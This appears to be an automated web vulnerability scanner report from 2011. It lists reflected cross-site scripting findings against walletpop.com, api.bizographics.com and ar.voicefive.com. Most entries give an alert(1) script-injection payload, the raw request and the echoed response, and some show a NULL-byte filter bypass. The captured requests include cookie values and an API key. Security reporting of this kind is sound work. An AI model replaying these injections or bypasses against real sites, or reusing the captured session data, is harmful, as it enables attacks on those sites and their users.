GET /taxes/forms%00b235b"><script>alert(1)</script>f1977b4d3f9 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:34 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999965 Connection: Keep-Alive Content-Type: text/html Content-Length: 35348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/forms%00b235b"><script>alert(1)</script>f1977b4d3f9/"/> ...[SNIP]...
1.760. http://www.walletpop.com/taxes/forms [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/forms
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f606a"><script>alert(1)</script>51cc7685ddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/forms?f606a"><script>alert(1)</script>51cc7685ddf=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b39e3"><script>alert(1)</script>aaa376160aa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxesb39e3"><script>alert(1)</script>aaa376160aa/forms/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0068092"><script>alert(1)</script>051fa4be222 was submitted in the REST URL parameter 2. This input was echoed as 68092"><script>alert(1)</script>051fa4be222 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/forms%0068092"><script>alert(1)</script>051fa4be222/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:31 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999993 Connection: Keep-Alive Content-Type: text/html Content-Length: 35349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/forms%0068092"><script>alert(1)</script>051fa4be222/"/> ...[SNIP]...
1.763. http://www.walletpop.com/taxes/forms/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/forms/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b40"><script>alert(1)</script>a165336345d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/forms/?f0b40"><script>alert(1)</script>a165336345d=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb22"><script>alert(1)</script>2b2f61f6d44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes4eb22"><script>alert(1)</script>2b2f61f6d44/online HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00744dd"><script>alert(1)</script>c2aec8b8417 was submitted in the REST URL parameter 2. This input was echoed as 744dd"><script>alert(1)</script>c2aec8b8417 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/online%00744dd"><script>alert(1)</script>c2aec8b8417 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:35 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999999 Connection: Keep-Alive Content-Type: text/html Content-Length: 35349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/online%00744dd"><script>alert(1)</script>c2aec8b8417/"/> ...[SNIP]...
1.766. http://www.walletpop.com/taxes/online [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/online
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962f2"><script>alert(1)</script>8bf0511d965 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/online?962f2"><script>alert(1)</script>8bf0511d965=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37240"><script>alert(1)</script>a4705706194 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes37240"><script>alert(1)</script>a4705706194/online/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005c48e"><script>alert(1)</script>d66fd919a3d was submitted in the REST URL parameter 2. This input was echoed as 5c48e"><script>alert(1)</script>d66fd919a3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /taxes/online%005c48e"><script>alert(1)</script>d66fd919a3d/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:51:35 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999998 Connection: Keep-Alive Content-Type: text/html Content-Length: 35351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/taxes/online%005c48e"><script>alert(1)</script>d66fd919a3d/"/> ...[SNIP]...
1.769. http://www.walletpop.com/taxes/online/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.walletpop.com
Path:
/taxes/online/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d65e"><script>alert(1)</script>7cb0b1c7a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /taxes/online/?6d65e"><script>alert(1)</script>7cb0b1c7a00=1 HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 87337<script>alert(1)</script>0c07fa081c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /v1/profile.json?api_key=r9t72482usanbp6sphprhvun&callback=bizo_callback HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: 87337<script>alert(1)</script>0c07fa081c4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KcHQgjfsRES4aj5XcunNcMDa7Re6IGD4lD9isMW4yisjii3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRxzXHkaVY6akFDLPXLn6FqEVUJBxdqAyD5JvasruiiXn4DYsCJ0KjazaTSYX2qPr7QipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Sun, 06 Feb 2011 20:59:28 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 58 Connection: keep-alive
The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload b842a<script>alert(1)</script>9b50966891e was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000743177/mnum=0000967044/cstr=83872517=_4d4f09d3,3366570328,743177_967044_1183_0,1_/xsxdata=1:93310694/bnum=83872517/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/300/L32/117431738/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_300/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/628576703/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=628576703? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de) ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&; BMX_3PC=1b842a<script>alert(1)</script>9b50966891e; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:51:38 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=45&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:51:38 2011&prad=58087449&arc=39969205&; expires=Sat 07-May-2011 20:51:38 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26745
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087449",Pid:"p85001580",Arc:"39969205",Location:CO ...[SNIP]... ecExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&', "BMX_3PC": '1b842a<script>alert(1)</script>9b50966891e', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', ...[SNIP]...
The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload a5843<script>alert(1)</script>408a77c22b1 was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000743177/mnum=0000967044/cstr=83872517=_4d4f09d3,3366570328,743177_967044_1183_0,1_/xsxdata=1:93310694/bnum=83872517/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/300/L32/117431738/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_300/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/628576703/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=628576703? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de) ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2Ca5843<script>alert(1)</script>408a77c22b1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:51:38 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=45&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:51:38 2011&prad=58087449&arc=39969205&; expires=Sat 07-May-2011 20:51:38 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26745
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087449",Pid:"p85001580",Arc:"39969205",Location:CO ...[SNIP]... "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2Ca5843<script>alert(1)</script>408a77c22b1', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&', "BMX_3PC": '1', "ar_p45555483": ...[SNIP]...
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 52760<script>alert(1)</script>f9fa39cddad was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087444&AR_C=40461884 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-129445681052760<script>alert(1)</script>f9fa39cddad; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:42:54 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:54 2011&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:54 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1297024974; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... ();}COMSCORE.BMX.Broker.Cookies={ "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-129445681052760<script>alert(1)</script>f9fa39cddad', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_da39f516a098b3de) ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload bb37a<script>alert(1)</script>cd3cb17e9d3 was submitted in the ar_da39f516a098b3de) ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087449&AR_C=39969205 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000743177/mnum=0000967044/cstr=83872517=_4d4f09d3,3366570328,743177_967044_1183_0,1_/xsxdata=1:93310694/bnum=83872517/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/300/L32/117431738/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_300/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/628576703/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=628576703? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; ar_da39f516a098b3de) ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&bb37a<script>alert(1)</script>cd3cb17e9d3; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 20:51:38 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=45&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:51:38 2011&bb37a<script>alert(1)</script>cd3cb17e9d3=&prad=58087449&arc=39969205&; expires=Sat 07-May-2011 20:51:38 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26745
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087449",Pid:"p85001580",Arc:"39969205",Location:CO ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:50 2011&prad=58087444&arc=40461884&bb37a<script>alert(1)</script>cd3cb17e9d3', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1297024970%2E607%2Cwait%2D%3E10000%2C', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464& ...[SNIP]...
